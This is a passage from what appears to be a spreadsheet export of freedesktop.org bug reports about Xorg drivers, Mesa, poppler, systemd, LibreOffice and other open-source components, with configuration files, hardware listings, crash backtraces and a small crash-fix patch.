kernel version: Linux roby-laptop 2.6.30-tuxonice-r6 #1 SMP PREEMPT Thu Nov 12 22:45:25 CET 2009 i686 Intel(R) Core(TM)2 CPU T5600 @ 1.83GHz GenuineIntel GNU/Linux 
(but i have seen the bug since many versions of each package)
------------------------------------------------------
graphic card: VGA compatible controller: ATI Technologies Inc M52 [Mobility Radeon X1300]
------------------------------------------------------
xorg.conf:
Section Monitor
	Identifier   	HANNS-G_HW191D
	VendorName   	HANNS-G
	ModelName    	HW191D
	HorizSync 	28.0 - 51.0
	VertRefresh 	43.0 - 60.0
	Option 		DPMS
	Modeline 	1440x900_60.00 	106.47 	1440 1520 1672 1904 	900 901 904 932 -HSync +Vsync
	Modeline 	1440x900_75.00  	136.49  1440 1536 1688 1936  	900 901 904 940 -HSync +Vsync
EndSection
Section Screen
	Identifier Screen0
	Device     Card0
	Monitor    Monitor0
	SubSection Display
		Viewport   0 0
		Depth	24
		Modes	1440x900
	EndSubSection
EndSection
Section Extensions
	Option  Composite on
EndSection
Section InputDevice
	Identifier  Keyboard0
	Driver      kbd
	Option 	    CoreKeyboard
	Option	    XkbLayout	it
EndSection
Section InputDevice
	Identifier  Mouse0
	Driver      mouse
	Option	    CorePointer
EndSection
Section ServerLayout
	Identifier     X.org Configured
	Option AllowEmptyInput false 
	InputDevice    Mouse0 CorePointer
	InputDevice    Keyboard0 CoreKeyboard
EndSection
Section Device
	Identifier  	Card0
	Driver      	radeon
	VendorName  	ATI Technologies Inc
	BusID       	PCI:1:0:0
	Option 		SWcursor 	on
	Option		DRI		on
EndSection
------------------------------------------------------
roby-laptop roby # lspci
00:00.0 Host bridge: Intel Corporation Mobile 945GM/PM/GMS 943/940GML and 945GT Express Memory Controller Hub (rev 03)
00:01.0 PCI bridge: Intel Corporation Mobile 945GM/PM/GMS 943/940GML and 945GT Express PCI Express Root Port (rev 03)
00:1b.0 Audio device: Intel Corporation 82801G (ICH7 Family) High Definition Audio Controller (rev 02)
00:1c.0 PCI bridge: Intel Corporation 82801G (ICH7 Family) PCI Express Port 1 (rev 02)
00:1c.1 PCI bridge: Intel Corporation 82801G (ICH7 Family) PCI Express Port 2 (rev 02)
00:1c.2 PCI bridge: Intel Corporation 82801G (ICH7 Family) PCI Express Port 3 (rev 02)
00:1c.3 PCI bridge: Intel Corporation 82801G (ICH7 Family) PCI Express Port 4 (rev 02)
00:1d.0 USB Controller: Intel Corporation 82801G (ICH7 Family) USB UHCI Controller #1 (rev 02)
00:1d.1 USB Controller: Intel Corporation 82801G (ICH7 Family) USB UHCI Controller #2 (rev 02)
00:1d.2 USB Controller: Intel Corporation 82801G (ICH7 Family) USB UHCI Controller #3 (rev 02)
00:1d.3 USB Controller: Intel Corporation 82801G (ICH7 Family) USB UHCI Controller #4 (rev 02)
00:1d.7 USB Controller: Intel Corporation 82801G (ICH7 Family) USB2 EHCI Controller (rev 02)
00:1e.0 PCI bridge: Intel Corporation 82801 Mobile PCI Bridge (rev e2)
00:1f.0 ISA bridge: Intel Corporation 82801GBM (ICH7-M) LPC Interface Bridge (rev 02)
00:1f.2 IDE interface: Intel Corporation 82801GBM/GHM (ICH7 Family) SATA IDE Controller (rev 02)
00:1f.3 SMBus: Intel Corporation 82801G (ICH7 Family) SMBus Controller (rev 02)
01:00.0 VGA compatible controller: ATI Technologies Inc M52 [Mobility Radeon X1300]
02:00.0 Ethernet controller: Broadcom Corporation NetLink BCM5787M Gigabit Ethernet PCI Express (rev 02)
05:00.0 Network controller: Intel Corporation PRO/Wireless 3945ABG [Golan] Network Connection (rev 02)
09:04.0 FireWire (IEEE 1394): O2 Micro Inc. Firewire (IEEE 1394) (rev 02)
09:04.1 CardBus bridge: O2 Micro Inc. Device 7175 (rev 21)
09:04.2 SD Host controller: O2 Micro Inc. Integrated MMC/SD Controller (rev 01)
09:04.3 Mass storage controller: O2 Micro Inc. Integrated MS/xD Controller (rev 01)
09:05.0 CardBus bridge: O2 Micro Inc. OZ601/6912/711E0 CardBus/SmartCardBus Controller (rev 40)
09:07.0 FireWire (IEEE 1394): Texas Instruments TSB43AB22/A IEEE-1394a-2000 Controller (PHY/Link)
------------------------------------------------------
Please tell me which additional informations you need. if needed i can recompile the radeon driver with debug info (through the 'debug' useflag in gentoo).</t>
  </si>
  <si>
    <t>hariseldon78</t>
  </si>
  <si>
    <t>XORG-6589</t>
  </si>
  <si>
    <t>LVDS detection through BIOS does not work.</t>
  </si>
  <si>
    <t>LVDS detection code from modesetting branch does not work for me.
I must force panel_type to 1 instead of detected 2 and adjust offsets by 8.
I have:
0000:00:02.0 VGA compatible controller: Intel Corporation Mobile
915GM/GMS/910GML Express Graphics Controller (rev 03)
0000:00:02.0 0300: 8086:2592 (rev 03)
more precisely Asus M6A laptop. With LVDS of 1280x800.</t>
  </si>
  <si>
    <t>MESA-93821</t>
  </si>
  <si>
    <t>radeonsi vaapi motion-adaptive deinterlace artifacts.</t>
  </si>
  <si>
    <t>Created attachment 121204
highlighted artifacts.
Testing with mpv like -
mpv --hwdec=vaapi --vo=vaapi --vf=vavpp:deint=motion-adaptive ....
Produces artifacts which look like old buffers/pixels around the edges of things get replayed in their old position if eg. the camera is panning.
The artifacts only appear in one field so those highlighted in the attached pic would flash on/off if frame stepping with mpv.
The artifacts do not vary on a given sample whether it's frame stepped/slow mo/normal speed.
Without pp or with deint=bob output is OK. (testing h264 as mpeg2 has it's own issues).
Using motion-adaptive deint via vdpau does not have the issue.
Only mpv tested as I failed so far to get gstreamer to use pp.</t>
  </si>
  <si>
    <t>FRIBIDI-83894</t>
  </si>
  <si>
    <t>should only include glib.h</t>
  </si>
  <si>
    <t>charset/fribidi-char-sets.c and lib/mem.h include glib/gstrfuncs.h and glib/gmem.h respectively. However since glib-2.31 only glib.h may be included directly and the individual includes throw an error (see [1]). Before that change there was a long deprecation period.
The reason this hasn't blown up in fribidi (at least it builds here) is probably that glib.h is included in common.h masking the error.
I think these two includes should just be dropped.
[1] https://git.gnome.org/browse/glib/tree/glib/gstrfuncs.h#n28</t>
  </si>
  <si>
    <t>bugs+behnam</t>
  </si>
  <si>
    <t>benedikt.morbach</t>
  </si>
  <si>
    <t>SWFDEC-17307</t>
  </si>
  <si>
    <t>sfwdec-mozilla plugin stops playing sounds</t>
  </si>
  <si>
    <t>The swfdec-mozilla plugins stops playing sound after ~10 seconds. I'm using pulseaudio and my ~/.asoundrc looks like this:
  pcm.!default { type pulse }
  ctl.!default { type pulse }
The output my browser gives me is this:
$ epiphany -p http://gnomecoder.wordpress.com/2008/08/26/luz-at-play/ 
** Message: GetValue variable 1 (1)
** Message: GetValue variable 2 (2)
** Message: GetValue variable 1 (1)
** Message: GetValue variable 2 (2)
** Message: GetValue variable 1 (1)
** Message: GetValue variable 2 (2)
** Message: GetValue variable 1 (1)
** Message: GetValue variable 2 (2)
** Message: GetValue variable 1 (1)
** Message: GetValue variable 2 (2)
** Message: GetValue variable 1 (1)
** Message: GetValue variable 2 (2)
** Message: GetValue variable 1 (1)
** Message: GetValue variable 2 (2)
** Message: GetValue variable 1 (1)
** Message: GetValue variable 2 (2)
** Message: GetValue variable 1 (1)
** Message: GetValue variable 2 (2)
** Message: GetValue variable 1 (1)
** Message: GetValue variable 2 (2)
** Message: GetValue variable 1 (1)
** Message: GetValue variable 2 (2)
** Message: GetValue variable 1 (1)
** Message: GetValue variable 2 (2)
** Message: GetValue variable 1 (1)
** Message: GetValue variable 2 (2)
** Message: GetValue variable 1 (1)
** Message: GetValue variable 2 (2)
** Message: GetValue variable 1 (1)
** Message: GetValue variable 2 (2)
Unsupported movie property wmode with value transparent
unhandled event 19
Loading stream: http://www.youtube.com/swf/l.swf?video_id=yGkWnz74zUk&amp;rel=0&amp;eurl=http%3A//gnomecoder.wordpress.com/2008/08/26/luz-at-play/&amp;iurl=http%3A//i2.ytimg.com/vi/yGkWnz74zUk/default.jpg&amp;t=OEgsToPDskJd96uAoMR-rcI8cnBL20Ky&amp;use_get_video_info=1&amp;load_modules=1&amp;
Loading stream: http://www.youtube.com/swf/cps.swf
Loading stream: http://i2.ytimg.com/crossdomain.xml
Loading stream: http://i2.ytimg.com/vi/yGkWnz74zUk/default.jpg
Loading stream: http://www.youtube.com/get_video_info?&amp;video_id=yGkWnz74zUk&amp;eurl=http%3A%2F%2Fgnomecoder%2Ewordpress%2Ecom%2F2008%2F08%2F26%2Fluz%2Dat%2Dplay%2F
Loading stream: http://nyc-v95.nyc.youtube.com/get_video?video_id=yGkWnz74zUk&amp;signature=23DBE455F18CB00DE78F005DA928439C036DB9BA.5E378F4DB7DA496A02A35655661D80ECAB8B2F2B&amp;ip=86.91.80.239&amp;ipbits=8&amp;expire=1219764796&amp;key=yt1&amp;sver=2
Loading stream: http://video-stats.video.google.com/s?ns=yt&amp;docid=yGkWnz74zUk&amp;ps=default&amp;el=embedded&amp;eurl=http%3A%2F%2Fgnomecoder%2Ewordpress%2Ecom%2F2008%2F08%2F26%2Fluz%2Dat%2Dplay%2F&amp;rt=1.2&amp;fv=WIN%209%2C0%2C100%2C0&amp;bc=258908&amp;st=0.04&amp;len=59.977&amp;et=0.04
snd_pcm_avail_update failed: Broken pipe
^C</t>
  </si>
  <si>
    <t>uws+freedesktop</t>
  </si>
  <si>
    <t>LIBQMI-77335</t>
  </si>
  <si>
    <t>segfault in qmi-proxy</t>
  </si>
  <si>
    <t>Created attachment 97226
Quick fix.
qmi-proxy can segfault due to a race condition when a new request has just been accepted but the device not yet opened and a device closing.
[10 Apr 2014 08:53:05] [Debug] client connection open...
[10 Apr 2014 08:53:05] [Debug] valid request to open connection to QMI device file: /dev/cdc-wdm1
[10 Apr 2014 08:53:05] [Debug] client connection closed
[10 Apr 2014 08:53:05] -Error ** qmi_device_get_path: assertion `QMI_IS_DEVICE (self)' failed
Program received signal SIGSEGV Segmentation fault.
0xb7ab3724 in strcmp () from /lib/i386-linux-gnu/libc.so.6
(gdb) bt
#0  0xb7ab3724 in strcmp () from /lib/i386-linux-gnu/libc.so.6
#1  0xb7d648a3 in g_str_equal () from /lib/i386-linux-gnu/libglib-2.0.so.0
#2  0xb7bc8278 in get_n_clients_with_device (device=0x805ba58 self=0x8055000) at qmi-proxy.c:146
#3  connection_close (client=client@entry=0x80555a0) at qmi-proxy.c:168
#4  0xb7bc8977 in connection_readable_cb (socket=0x8060a88 condition=17 client=0x80555a0) at qmi-proxy.c:564
#5  0xb7ee630b in ?? () from /usr/lib/i386-linux-gnu/libgio-2.0.so.0
#6  0xb7d746d3 in g_main_context_dispatch () from /lib/i386-linux-gnu/libglib-2.0.so.0
#7  0xb7d74a70 in ?? () from /lib/i386-linux-gnu/libglib-2.0.so.0
#8  0xb7d74ecb in g_main_loop_run () from /lib/i386-linux-gnu/libglib-2.0.so.0
#9  0x08048e7b in main (argc=1 argv=0xbffffdd4) at qmi-proxy.c:212</t>
  </si>
  <si>
    <t>albert.diserholt</t>
  </si>
  <si>
    <t>PKG-CONFIG-13188</t>
  </si>
  <si>
    <t>Man page doesn't document Requires.private</t>
  </si>
  <si>
    <t>There's a bit about Libs.private but nothing about Requires.private</t>
  </si>
  <si>
    <t>XORG-82068</t>
  </si>
  <si>
    <t>UXA regression causes BENQ FP747 screen to go berserk upon xrandr --auto</t>
  </si>
  <si>
    <t>There is a very serious bug introduced between
&gt; 2:2.99.911+git20140529-1~exp2 makes screen go berserk.
&gt; 2:2.99.911+git20140529-1~exp1 works fine.
in Debian that Debian has asked me to report here.
Found in versions xserver-xorg-video-intel/2:2.99.911+git20140529-1~exp2 xserver-xorg-video-intel/2:2.99.912-1~exp1
xserver-xorg-video-intel/2:2.99.914-1~exp1
It happens on EEEPC 702.
The workaround is for users to use
Section Device
    Identifier  Intel Graphics
    Driver      intel
    Option      AccelMethod  uxa
EndSection
For full details kindly see
https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=750605</t>
  </si>
  <si>
    <t>MESA-32910</t>
  </si>
  <si>
    <t>Keywords 'in' and 'out' not handled properly for GLSL 1.20 shaders</t>
  </si>
  <si>
    <t>In GLSL 1.20 mode the keywords 'in' and 'out' are (incorrectly) accepted on global variables.  This was discovered by code inspection and verified with piglit tests spec/glsl-1.20/compiler/qualifiers/in-01.vert and spec/glsl-1.20/compiler/qualifiers/out-01.vert.</t>
  </si>
  <si>
    <t>UDISKS-54566</t>
  </si>
  <si>
    <t>udisks_client_get_block_for_dev() does not work on 32 bit machines</t>
  </si>
  <si>
    <t>When reviewing the recent test case failures of udisks on our QA machinery I noticed that on i386 it consistently fails all over the place.
So far I tracked this down to udisks_client_get_block_for_dev() not working on 32 bit x86 it never finds a match. It works fine on x86_64.
Reproducer from built trunk:
$ GI_TYPELIB_PATH=udisks LD_LIBRARY_PATH=udisks/.libs/ python3 -c 'import os from gi.repository import UDisks c=UDisks.Client.new_sync(None) print(c.get_block_for_dev(os.stat(/dev/sda).st_rdev))'
on 32 bit this doesn't find anything.</t>
  </si>
  <si>
    <t>FREETYPE-7486</t>
  </si>
  <si>
    <t>DejaVu: German umlaut Ã¶ is rendered with only one dot.</t>
  </si>
  <si>
    <t>The German umlaut Ã¶ (HTML-Code: ) is not rendered correctly on my Fedora
Core 5 system.
Here are some details
Tested font family: DejaVu Sans
DejaVu Sans Book size 10 and Sans Mono Book size 10
TFT Display 1280x1024 96 ppi
xdpyinfo reports:
screen #0:
  print screen:    no
  dimensions:    1280x1024 pixels (382x302 millimeters)
  resolution:    85x86 dots per inch
  depths (7):    24 1 4 8 15 16 32</t>
  </si>
  <si>
    <t>ch.nolte</t>
  </si>
  <si>
    <t>LIBREOFFICE-44065</t>
  </si>
  <si>
    <t>FILEOPEN: Thunderbird assistant leads to wrong address birthday (year-day) fields</t>
  </si>
  <si>
    <t>Problem description: 
Steps to reproduce:
1. enter a birth date in thunderbird adress book
2. use assistant to use this addressbook
3. look for birthday year (month appears here) birthday month (day appears here) and birthday day (nothing appears here)
Current behavior:
birthday year (month appears here) birthday month (day appears here) and birthday day (nothing appears here)
Expected behavior:
birthday year shows year month shows month and and day shows day (like in e.g. OpenOffice 2.4.2)
Platform (if different from the browser): 
Win XP</t>
  </si>
  <si>
    <t>XORG-9748</t>
  </si>
  <si>
    <t>Possible GPL license in keyboard driver</t>
  </si>
  <si>
    <t>These two files seem to have originated from GPL code but there is no 
indication that they are available under the MIT/X11 license.
xorg-server-1.1.1/hw/xfree86/os-support/linux/lnx_io.c
xorg-server-1.1.1/hw/xfree86/os-support/linux/lnx_kbd.c
There is a comment in these files:
/* kbd rate stuff based on kbdrate.c from Rik Faith  et.al.
 * from util-linux-2.9t package */
The file kbdrate.c in package util-linux-2.9 is under the GPL.</t>
  </si>
  <si>
    <t>XORG-68987</t>
  </si>
  <si>
    <t>intel-virtual-overlay: damage tracking goes awry</t>
  </si>
  <si>
    <t>Created attachment 85267
xrandr output
When using the new virtual output support in version 2.99.901 of the driver the external screen only shows the background image of the desktop and the mouse cursor. Any window partially or fully moved to the virtual screen is not displayed.
Hardware:
Intel HD 3000
NVIDIA Quadro NVS 4200M
Software:
X.Org Intel driver 2.99.901
NVIDIA driver 325.15
X.Org X server 1.13.4
Please let me know if any additional information would be helpful in tracking down this issue.</t>
  </si>
  <si>
    <t>fd</t>
  </si>
  <si>
    <t>XKEYBOARD-CONFIG-44035</t>
  </si>
  <si>
    <t>Lao hard-coded layout switcher confuses with system setting</t>
  </si>
  <si>
    <t>In symbols/la the override key  and override key  clauses have confuse with system settings when used under trilingual environment. For example:
$ setxkbmap -v usthla -option grp:alt_shift_toggle
Expected behavior:
- Alt+RightShift rotates forward (us-&gt;th-&gt;la-&gt;us)
- Alt+LeftShift rotates backward (us-&gt;la-&gt;th-&gt;us)
What actually happens:
- Alt+LeftShift only toggles between us and la no other intermediate layout can be reached.
- Alt+RightShift switches from any layout to th and gets stuck there.
Thus the overrides should be removed from Lao keyboard map.</t>
  </si>
  <si>
    <t>XKEYBOARD-CONFIG-7674</t>
  </si>
  <si>
    <t>UK Keyboard driver dropped compose support</t>
  </si>
  <si>
    <t>Prior to Fedora Core 5 it was possible to use X.org in a UK environment. Various
symbols needed in the UK for real practical use (i +  a+e etc) plus those
needed for anyone dealing with names or foreign language names (notably western
european and eastern european accented symbols) could be typed using the
shift-altgr compose sequence. Not all are available without shift-altgr.
In FC5 this feature only works outside of X11 and it makes it very unusable for
serious work. en_GB (properly en_UK but thats another story) does actually
require shift-altgr compose support and it should be restored. This is a revert
from FC4 where it all just worked.
(Note Mike Harris asked me to file this upstream so if its Fedora specific ... 8))
Linux 2.6.x compose working correctly in console modes not X
Duplicatable in both xterm and gnome</t>
  </si>
  <si>
    <t>XORG-24543</t>
  </si>
  <si>
    <t>[855GM overlay KMS] no overlay support</t>
  </si>
  <si>
    <t>Created attachment 30440
Xorg.0.log
From Xorg.0.log:
(WW) intel(0): Disabling Xv because no adaptors could be initialized.
kernel : Eric's drm-intel-next as of yesterday (2.6.32-rc4-00020-g8a79060)
libdrm : 3a387a983ec40cd443e22c1f8d9a6b5b5a8fa0d1
-intel : 86bc23ab5da34137c82250395c68aa92ecd88a24
server : 1.6.5</t>
  </si>
  <si>
    <t>LIBREOFFICE-78845</t>
  </si>
  <si>
    <t>UI Icon Create New Folder in dialog File Save (As) closes dialog and doesn't show the needed dialog</t>
  </si>
  <si>
    <t>Created attachment 99255
Screen Capture - SAVEAS with 3 Icons in Upper Right
After Launching Writer from the Taskbar in Windows 7 with a user profile attempt to do a 'SaveAs' and create a 'NEW FOLDER' prior to doing a SaveAs when clicking the 'NewFolder' Icon the 'SaveAs' window exits but no 'New Folder' window opens up.
Expectation is to function as it has in the past where a user could create a new subfolder in any writable directory then perform the save to the new folder.
Clicking the 3rd Icon to the Upper Right Causes the 'SaveAs' screen to exit without a NewFolder Dialogue being launched. (Does Not happen on 4.2.4.2 for Windows x64 on WOW using IA64 CPU)</t>
  </si>
  <si>
    <t>richard416282</t>
  </si>
  <si>
    <t>SYSTEMD-69209</t>
  </si>
  <si>
    <t>RFE: All unit condition pre-requisites mismatch must be logged</t>
  </si>
  <si>
    <t>Simple action:
I have an Archlinux which up to date with latest packages on my laptop.
There are i8k package which provides a kernel module and monitoring service. Unit of this service is quite simple:
[Unit]
Description=Dell laptop thermal monitoring
ConditionPathExists=/proc/i8k
[Service]
ExecStart=/usr/bin/i8kmon -d
[Install]
WantedBy=multi-user.targe
If I run this unit as systemctl i8k start the only change I have is line
systemd[1]: Started Dell laptop thermal monitoring.
in journal (journalctl -b) where an nothing was started (pgrep confirms it) because /proc/i8k does not exists (kernel module is not loaded).
So it would be awesome to report about any condition which does not met in journal like:
systemd[1]: Unable to start Dell laptop thermal monitoring coz ConditionPathExists=/proc/i8k does not met
and this will really simplify our life's :)
Sorry for your time if it's dup.</t>
  </si>
  <si>
    <t>koloboid</t>
  </si>
  <si>
    <t>DRI-66610</t>
  </si>
  <si>
    <t>[PNV/ILK] igt/module_reload fails and causes many cases fail: modules.dep: no such file</t>
  </si>
  <si>
    <t>System Environment:
--------------------------
Arch:           i386
Platform:       pineview
Kernel:	(drm-intel-fixes) 446f8d81ca2d9cefb614e87f2fabcc996a9e4e7e
Bug detailed description:
-------------------------
It fails on pineview with drm-intel-fixes kernel and drm-intel-next-queued kernel. I can't find a good commit. It also has this issue on (drm-intel-fixes) 8abbbaf6adb46157b6bd416f7616b555cc6a332f.
Run ./module_reload then run following cases they also fail.
igt/gem_ctx_bad_destroy	
igt/gem_hangcheck_forcewake	
igt/gem_largeobject	
igt/gem_mmap_offset_exhaustion	
igt/gem_ring_sync_loop	
igt/gem_storedw_loop_bsd	
igt/gem_storedw_loop_render	
igt/gem_tiled_pread	
igt/gen3_mixed_blits	
igt/gen3_render_linear_blits	
igt/module_reload	
igt/prime_self_import/with_two_bos
output:
module successfully unloaded
FATAL: Could not load /lib/modules/3.10.0-rc7_drm-intel-fixes_446f8d_20130704_+/modules.dep: No such file or directory
./module_reload: line 39: /sys/class/vtconsole/vtcon1/bind: No such file or directory
gem_create:487 failed ret=-1 errno=9
./module_reload: line 42:  3759 Aborted                 (core dumped) $SOURCE_DIR/gem_exec_nop &gt; /dev/null
dmesg:
[  127.169426] Console: switching to colour VGA+ 80x25
[  127.175588] [drm:intel_crtc_cursor_set] cursor off
[  127.175597] [drm:intel_crtc_set_config] [CRTC:3] [NOFB]
[  127.175607] [drm:intel_modeset_stage_output_state] [CONNECTOR:5:LVDS-1] to [CRTC:4]
[  127.175613] [drm:intel_crtc_cursor_set] cursor off
[  127.175617] [drm:intel_crtc_set_config] [CRTC:4] [FB:14] #connectors=1 (x y) (0 0)
[  127.175625] [drm:intel_modeset_stage_output_state] [CONNECTOR:5:LVDS-1] to [CRTC:4]
[  127.183992] drm_kms_helper: drm: unregistered panic notifier
[  127.188110] [drm:i915_get_vblank_counter] trying to get vblank count for disabled pipe A
[  127.188953] [drm:intel_crtc_cursor_set] cursor off
[  127.188966] [drm:intel_crtc_cursor_set] cursor off
[  127.193990] [drm] Module unloaded
Reproduce steps:
----------------
1. ./module_reload</t>
  </si>
  <si>
    <t>POPPLER-36693</t>
  </si>
  <si>
    <t>poppler: crash on truncated JPEG/DCT stream</t>
  </si>
  <si>
    <t>Attached fuzzed PDF from Sauli Pahlman crashes poppler at or around DCTStream::reset.  The reason for the crash is that the file contains a truncated JPEG image which does not contain full image header.  jpeg_read_header() called from DCTStream::reset returns JPEG_SUSPENDED and some of the cinfo struct members are not properly set causing a NULL pointer dereference crash on this specific file.
This change avoids the crash on this file:
index 78cd59d..e96ec5a 100644
--- a/poppler/DCTStream.cc
+++ b/poppler/DCTStream.cc
@@ -1418 +1417 @@ void DCTStream::reset() {
     }
   }
-  if (!setjmp(err.setjmp_buffer)) {
-    jpeg_read_header(
+  if (!setjmp(err.setjmp_buffer) &amp;&amp; jpeg_read_header(&amp;cinfo TRUE) != JPEG_SUSPENDED) {
     // figure out color transform
     if (colorXform == -1 &amp;&amp; !cinfo.saw_Adobe_marker) {</t>
  </si>
  <si>
    <t>thoger</t>
  </si>
  <si>
    <t>XORG-15925</t>
  </si>
  <si>
    <t>X crash in memcpy() when starting to play videos (Intel 915GM)</t>
  </si>
  <si>
    <t>Forwarding this bug reported against Ubuntu:
https://bugs.launchpad.net/xserver-xorg-video-intel/+bug/220019
This bug is occurring in Hardy xserver-xorg version 1:7.3+10ubuntu10 regardless of compiz being activated or not with Totem as well as with MPlayer. I have an Intel 915GM card using the i810 server.
Randomly opening a video makes X crash before any image is displayed. X restarts and I'm back to GDM. No specific video will trigger this and later I'll be able to play the same video file without trouble. I could notice the crash is almost always occurring when Kdenlive (video editing app) has been running for a while but else the bug can happen at anytime in an unpredictable way.
Attached are the different log files and here's the most relevant part of Xorg.0.log.old (that of the crash):
Backtrace:
0: /usr/bin/X(xf86SigHandler+0x7e) [0x80c780e]
1: [0xb7f9f420]
2: /usr/bin/X [0x80da805]
3: /usr/lib/xorg/modules/extensions//libextmod.so(XvdiPutImage+0x178) [0xb7c08608]
4: /usr/lib/xorg/modules/extensions//libextmod.so [0xb7c0b476]
5: /usr/bin/X [0x81506de]
6: /usr/bin/X(Dispatch+0x2cf) [0x808d8df]
7: /usr/bin/X(main+0x48b) [0x807471b]
8: /lib/tls/i686/cmov/libc.so.6(__libc_start_main+0xe0) [0xb7d31450]
9: /usr/bin/X(FontFileCompleteXLFD+0x201) [0x8073a91]
Fatal server error:
Caught signal 11. Server aborting
http://launchpadlibrarian.net/13590425/Xorg.0.log.old
http://launchpadlibrarian.net/13590420/Xorg.0.log
lspci info:
00:02.0 VGA compatible controller [0300]: Intel Corporation Mobile 915GM/GMS/910GML Express Graphics Controller [8086:2592] (rev 03) (prog-if 00 [VGA controller])
	Subsystem: Toshiba America Info Systems Unknown device [1179:ff00]
	Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B-
	Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- SERR- &lt;PERR-
	Latency: 0
	Interrupt: pin A routed to IRQ 17
	Region 0: Memory at b0080000 (32-bit non-prefetchable) [size=512K]
	Region 1: I/O ports at 1800 [size=8]
	Region 2: Memory at c0000000 (32-bit prefetchable) [size=256M]
	Region 3: Memory at b0000000 (32-bit non-prefetchable) [size=256K]
	Capabilities: 
Here's a more detailed backtrace:
http://launchpadlibrarian.net/14258144/trace with gdb.log
Program received signal SIGSEGV Segmentation fault.
[Switching to Thread 0xb7caba30 (LWP 6788)]
0xb7dbd9bc in memcpy () from /lib/tls/i686/cmov/libc.so.6
(gdb) bt full
#0  0xb7dbd9bc in memcpy () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
#1  0xb7b841d8 in I830PutImage (pScrn=0x821b718 src_x= 
    src_y= drw_x=5 drw_y=119 src_w=720 src_h=576 
    drw_w=796 drw_h=447 id=808596553 
    buf=0xa2910000 SerZFT\\UY[]\\YWX[ZPONIR__hhhtwmlimkhfhhb[UURROKOQPU\\]UMLPUZZSORTSTTSQPQTV`c^VZfjfhcdeca]VSX]XWZ[bfidciebkhvvpttnmsprmmomuurjgiffmztyz{zw}z~\201\200~\177\200\200\206\203\202\201~}}z\200\202\177s}\204w\177\205\202~}\177\201~yy\201\207\203\212}y\206\204s\201\210mboywhhh\204Ã¯Â¿Â½\232\210\216\213\223\215tkss... width=720 height=576 sync=0 clipBoxes=0xbf8c52e4 data=0x822f134 
    pDraw=0x8d798f8) at ../../src/i830_video.c:1379
	pI830 = (I830Ptr) 0x821d168
	pScreen = (ScreenPtr) 0x8229918
	pPixmap = 
	x1 = 0
	x2 = 47185920
	y1 = 0
	y2 = 37748736
	srcPitch = 720
	srcPitch2 = 360
	dstPitch = 384
	destId = 808596553
	top = 0
---Type  to continue or q  to quit---
	left = 0
	npixels = 720
	nlines = 576
	size = 663552
	dstBox = {x1 = 5 y1 = 119 x2 = 801 y2 = 566}
	pitchAlignMask = 
	alloc_size = 
	extraLinear = 
	crtc = 
#2  0x080da805 in xf86XVPutImage (client=0x8a13738 pDraw=0x8d798f8 
    pPort=0x825a1f8 pGC=0x8ae7c20 src_x= 
    src_y= src_w= 
    src_h= drw_x=0 drw_y=0 
    drw_w= drw_h= 
    format=0x8259fc0 
    data=0xa2910000 SerZFT\\UY[]\\YWX[ZPONIR__hhhtwmlimkhfhhb[UURROKOQPU\\]UMLPUZZSORTSTTSQPQTV`c^VZfjfhcdeca]VSX]XWZ[bfidciebkhvvpttnmsprmmomuurjgiffmztyz{zw}z~\201\200~\177\200\200\206\203\202\201~}}z\200\202\177s}\204w\177\205\202~}\177\201~yy\201\207\203\212}y\206\204s\201\210mboywhhh\204Ã¯Â¿Â½\232\210\216\213\223\215tkss... sync=0 width= height=)
    at ../../../../hw/xfree86/common/xf86xv.c:1777
	portPriv = 
	WinRegion = {extents = {x1 = 5 y1 = 119 x2 = 801 y2 = 566} 
---Type  to continue or q  to quit---
  data = 0x0}
	ClipRegion = {extents = {x1 = 5 y1 = 119 x2 = 801 y2 = 566} 
  data = 0x0}
	ret = 0
#3  0xb7c37608 in XvdiPutImage (client=0x8a13738 pDraw=0x8d798f8 
    pPort=0x825a1f8 pGC=0x8ae7c20 src_x= 
    src_y= src_w= 
    src_h= drw_x= 
    drw_y= drw_w= 
    drw_h= image=0x8259fc0 
    data=0xa2910000 SerZFT\\UY[]\\YWX[ZPONIR__hhhtwmlimkhfhhb[UURROKOQPU\\]UMLPUZZSORTSTTSQPQTV`c^VZfjfhcdeca]VSX]XWZ[bfidciebkhvvpttnmsprmmomuurjgiffmztyz{zw}z~\201\200~\177\200\200\206\203\202\201~}}z\200\202\177s}\204w\177\205\202~}\177\201~yy\201\207\203\212}y\206\204s\201\210mboywhhh\204Ã¯Â¿Â½\232\210\216\213\223\215tkss... sync=0 width= height=)
    at ../../Xext/xvmain.c:730
No locals.
#4  0xb7c3a476 in ProcXvShmPutImage (client=0x8a13738)
    at ../../Xext/xvdisp.c:1180
	pDraw = (DrawablePtr) 0x8d798f8
	pPort = (XvPortPtr) 0x825a1f8
	pImage = (XvImagePtr) 0x8259fc0
	pGC = (GCPtr) 0x8ae7c20
---Type  to continue or q  to quit---
	status = -1567555584
	size_needed = 
	i = 
	width = 720
	height = 576
#5  0x081506de in XaceCatchExtProc (client=0x8a13738) at ../../Xext/xace.c:299
	major = 140
	ext = 
#6  0x0808d8df in Dispatch () at ../../dix/dispatch.c:502
	result = 
	client = (ClientPtr) 0x8a13738
	nready = 0
	start_tick = 3760
#7  0x0807471b in main (argc=10 argv=0xbf8c59a4 envp=Cannot access memory at address 0xbc
)
    at ../../dix/main.c:452
	i = 1
	error = 136163204
	xauthfile = 
	alwaysCheckForInput = {0 1}
(gdb)</t>
  </si>
  <si>
    <t>XORG-30528</t>
  </si>
  <si>
    <t>[945GM bisected] unredrawn borders</t>
  </si>
  <si>
    <t>Created attachment 39094
example of Gnome Terminal being corrupted by an xmgrace window
After the most recent upgrade (Xorg.log reports 1.7.7 and older version is 
1.7.4).  I have noticed corruption of gnome-terminal xfce4 terminal 
konsole ksnapshot and rhythmbox windows when passed over the vertical and 
horizontal edges of certain GUI programs.  It is likely that there are 
many more which show this effect.  The problem does not always occur the 
same way for every offending GUI window sometimes it is only vertical 
lines sometimes it is both horizontal and vertical lines.  The offending 
programs for which I have noticed this effect so far are xfig xmgrace 
(grace) and xpaint.  I am sure that there are others but tgif and 
iceweasel in particular do not show this effect.
Refreshing the terminal window moving to another desktop and then back 
again restores the uncorrupted windows although just refreshing a terminal 
window will not clean up the window menu area which remains corrupt until 
the desktop is switched.  Passing another terminal window also cleans up 
most of the corrupted area except any portions lying on top of the 
offending program's window edges.
The effect is also present in the subwindows of the xmgrace program and 
